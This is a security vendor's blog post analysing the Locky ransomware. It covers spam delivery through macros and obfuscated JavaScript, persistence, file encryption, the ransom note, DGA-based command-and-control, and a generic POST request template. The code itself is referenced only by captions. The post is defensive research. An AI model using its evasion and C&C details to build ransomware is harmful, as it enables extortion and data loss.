Tuesday, March 22, 2016

A look at Locky ransomware


The Locky ransomware was first spotted in the wild in February 2016. Locky came into the limelight when it hit the Hollywood Hospital last month causing the hospital to pay Bitcoins worth $17,000 in ransom.  Locky is known to arrive via spam e-mails containing malicious attachments.

Zscaler has blocked over 75 unique & new payloads from this ransomware family, targeting our customers, in the last month as shown below:

Locky ransomware unique payloads blocked

The Locky payload delivery mechanism

The initial wave of Locky ransomware spam involved malicious Microsoft Office documents containing VBA macro to download and execute binary payload on the victim machine. Locky authors have since switched to spamming a Zip archive containing malicious JavaScript to download and execute the Locky payload

A sample malicious document from a Locky spam campaign that contains VBA macro designed to download the Locky payload from a predetermined remote location can be seen below:

Malicious Document

A second delivery mechanism involves a heavily obfuscated JavaScript files in a Zip attachment. These JavaScript payloads are highly obfuscated and leverages UTF-16 encoding to hide the download URL. The authors are also changing the obfuscated payload regularly in order to evade AV detection, a technique commonly used by Exploit Kit (EK) authors to protect the EK landing pages. A sample malicious JavaScript code delivering Locky ransomware can be seen below:

Obfuscated JavaScript to deliver Locky
The JavaScript uses ActiveX objects to download Locky ransomware on victim's machine. The decoded JavaScript is shown below:

Decoded JavaScript

Payload Analysis

We have seen a large uptick in the delivery of Locky payloads during the month of March 2016.

Uptick in Locky payloads getting blocked
We looked at one of the newer Locky variant that was seen in the wild recently. The analyzed Locky payload is a 32-bit Microsoft Visual C++ compiled Windows executable packed using custom packer routine.

Upon execution, the malware first checks for the user & system default language preferences of the infected system and terminates itself if the language is Russian. Locky creates a copy of itself as "%TEMP%/svchost.exe" and an auto start registry key entry to ensure persistence upon system reboot. In order to mark a successful infection on the system, Locky creates the following registry keys with value name "pubkey" and "paytext" as seen below:

Locky registry key
"pubkey" is used to store the RSA key used for encryption
"paytext" is used to store the payment related information

Upon successful infection, Locky will encrypt the following file types on the victim machine:

File types encrypted
These encrypted files are renamed to unique ID generated for the victim's machine followed by unique file ID and a ".locky" extension. The ransom note is displayed in a bitmap image that is also set as a wallpaper for the infected user's desktop as seen below:

Ransom note
As seen in case of other crypto ransomware families, victim's files are held as hostage for a ransom. The ransom payment instructions for receiving the private RSA key required to decrypt the user files is readily available through the URLs mentioned in the ransom note.

Payment instructions

Command & Control communication

The Locky payload contains a list of hardcoded Command & Control (C&C) server IP addresses that appear in plain text in the unpacked binary as seen below:

Hardcoded C&C IPs
In addition, Locky ransomware also leverages a custom Domain Generation Algorithm (DGA) for hiding its C&C server location. The DGA algorithm used for generating possible C&C domains in the payload that we analyzed can be seen below:

Domain Generation Algorithm

Locky communicates with the C&C server using custom encryption and the following HTTP request format:

POST  http:// [hardcoded IP  or DGA domain]/main.php

Sample encrypted C&C communication

The initial C&C communication typically consists of three HTTP POST requests.

Request #1: Register the infected system's unique ID and request RSA key to be used for encrypting user files. The figure below shows the content of this POST request in plain text:

C&C request #1

The server responds back with a RSA key that is used by Locky to encrypt all the user's files on the victim machine.

Request #2: Request the content of ransom note to be displayed on the infected system asking for payment. Below is the content of this POST request as well as the response from the C&C server in decoded form:
C&C request #2 & response
Request #3: The final request sends the statistics about successfully encrypted files as seen below:
C&C request #3


Locky is the latest addition to Ransomware, one of the most active & lucrative malware strains seen in past three years. This new ransomware family follows the same model of using asymmetric (public key) encryption to lock user documents and demand ransom for the decryption key.  The delivery vector has been primarily spammed e-mail attachments that are responsible for downloading the Locky payload. We also noticed an interesting overlap in the recent campaigns where same URLs were being used to deliver both Dridex & Locky payloads.

Zscaler’s ThreatLabZ has confirmed coverage for the initial downloader and Locky payloads, ensuring protection for organizations using Zscaler’s Internet security platform.

Research by: Deepen Desai, Dhanalakshmi PK

No comments: